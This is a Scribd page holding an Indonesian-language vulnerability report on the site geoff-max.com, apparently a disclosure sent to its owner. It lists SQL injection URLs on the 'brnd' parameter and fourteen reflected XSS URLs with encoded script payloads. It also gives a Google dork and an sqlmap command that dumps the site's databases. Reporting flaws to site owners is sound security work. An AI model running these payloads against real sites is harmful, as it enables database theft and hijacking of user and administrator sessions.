Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • Report Bugs: SQL Injection Pada Situs Geoff-Max Melalui Parameter " " Dan XSS Pada Situs Geoff-Max

    Загружено:

    Andrew Wilson
    14 просмотров3 страницы
    bug report

    Оригинальное название

    Bug Geoffmax

    Авторское право

    © © All Rights Reserved

    Доступные форматы

    PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ
    bug report

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    14 просмотров3 страницы

    Report Bugs: SQL Injection Pada Situs Geoff-Max Melalui Parameter " " Dan XSS Pada Situs Geoff-Max

    Загружено:

    Andrew Wilson
    bug report

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 3

    REPORT BUGS

    SQL injection pada Situs geoff-max melalui parameter “brnd= “ dan


    XSS pada Situs geoff-max
     Vulnerebel type : SQL injection
     Vuln Path :
    1. https://geoff-max.com/boys/search?
    idsrch=0&prodkat=1&ref=0&brnd=1’&txtcr=noble
    2. https://geoff-
    max.com/girls/search?prodkat=0&ref=0&brnd=2'&txtcr=237250&idsrch=1&limitpag
    e=20
     Vulnerebel type : XSS (Cross Site Script)
     Vuln Path :
    1. https://geoff-
    max.com/boys/index.php?ref=0sgyff%22%3e%3cscript%3ealert(“XSS”)%3c%2fscript
    %3etmelq
    2. https://geoff-
    max.com/boys/index.php?ref=evesk%22%3e%3cscript%3ealert(“XSS”)%3c%2fscript
    %3eu78m2
    3. https://geoff-
    max.com/boys/search?prodkat=6&ref=&brnd=1w739n%22%3e%3cscript%3ealert(“
    XSS”)%3c%2fscript%3epeoxp&txtcr=&idsrch=1&limitpage=20
    4. https://geoff-
    max.com/boys/search?prodkat=6p4bqx%22%3e%3cscript%3ealert(“XSS”)%3c%2fscr
    ipt%3el5hfn&ref=&brnd=1&txtcr=&idsrch=1&limitpage=20
    5. https://geoff-
    max.com/boys/search?prodkat=6&ref=r6f9u%22%3e%3cscript%3ealert(“XSS”)%3c%
    2fscript%3ec6cz6&brnd=1&txtcr=&idsrch=1&limitpage=20
    6. https://geoff-
    max.com/boys/search?prodkat=6&ref=wti9u%22%3e%3cscript%3ealert(“XSS”)%3c
    %2fscript%3ea6bdx&brnd=1&txtcr=&idsrch=1&limitpage=20
    7. https://geoff-
    max.com/girls/index.php?ref=0wd7l2%22%3e%3cscript%3ealert(“XSS”)%3c%2fscrip
    t%3emgr56
    8. https://geoff-
    max.com/girls/index.php?ref=w174r%22%3e%3cscript%3ealert(“XSS”)%3c%2fscript
    %3epoerc
    9. https://geoff-
    max.com/girls/search?prodkat=0&ref=0&brnd=2yyxob%22%3e%3cscript%3ealert(“
    XSS”)%3c%2fscript%3ek0r4b&txtcr=237250&idsrch=1&limitpage=20
    10. https://geoff-
    max.com/girls/search?prodkat=0cc2cv%22%3e%3cscript%3ealert(“XSS”)%3c%2fscri
    pt%3el8p3x&ref=0&brnd=2&txtcr=237250&idsrch=1&limitpage=20
    11. https://geoff-
    max.com/girls/search?prodkat=0&ref=0x7wl7%22%3e%3cscript%3ealert(“XSS”)%3c
    %2fscript%3ekp7zk&brnd=2&txtcr=237250&idsrch=1&limitpage=20
    12. https://geoff-
    max.com/girls/search?prodkat=0&ref=gkwwn%22%3e%3cscript%3ealert(“XSS”)%3c
    %2fscript%3ego63f&brnd=2&txtcr=237250&idsrch=1&limitpage=20
    13. https://geoff-
    max.com/search?prodkat=0&ref=eid1v%22%3e%3cscript%3ealert(“XSS”)%3c%2fscri
    pt%3el8p32&brnd=0&txtcr=195030&idsrch=1&limitpage=20
    14. https://geoff-
    max.com/search?prodkat=0&ref=pq4mj%22%3e%3cscript%3ealert(“XSS”)%3c%2fsc
    ript%3el3x2g&brnd=0&txtcr=195030&idsrch=1&limitpage=20

    Description
    SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada
    lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring
    secara benar

    Dampak SQL injection : Otentikasi Bypass, Pencurian Informasi, Compromised


    Integritas Data, Compromised Ketersediaan Data, Remote Command Execution, Defaces.

    Karena artikel dapat di akses publik, maka bug ini dapat berpengaruh kepada semua
    pengguna dari domain tersebut. Selain itu, ini dapat digunakan untuk melakukan tindakan
    terhadap administrator (atau setiap pengguna yang mengunjungi halaman tersebut) dan
    berpotensi menyebabkan pembajakan sesi / token pengguna. Ini dapat terjadi oleh
    pengguna yang mengunjungi artikel penyerang

    Dampak XSS (Cross Site Script) Pembajakan Sesi Administrator akan


    memungkinkan penyerang untuk melakukan tindakan seperti: mengedit atau menghapus
    data, menyamar sebagai admin untuk merancang secara sosial pengguna lain, atau
    tindakan lain yang dapat diakses oleh admin

    Reproduction
    1. Menggunakan Google Dorking ( inurl: brnd= site:geoff-max,com)
    2. Menggunakan sqlmap untuk mendapatkan Database
    Attack vector or Payload
    Menggunakan sqlmap dengan parameter

    sqlmap -u "https://geoff-
    max.com/boys/search?idsrch=0&prodkat=1&ref=0&brnd=1*&txtcr=noble" --ignore-
    redirects --random-agent --batch –dbs

    END

    Note:
    Bersamaan dengan email yang saya kirim, saya juga melampirkan file format html untuk
    ulasan lebih detailnya, tolong buka via mozilla dikarenakan chroome tidak bisa

    Вам также может понравиться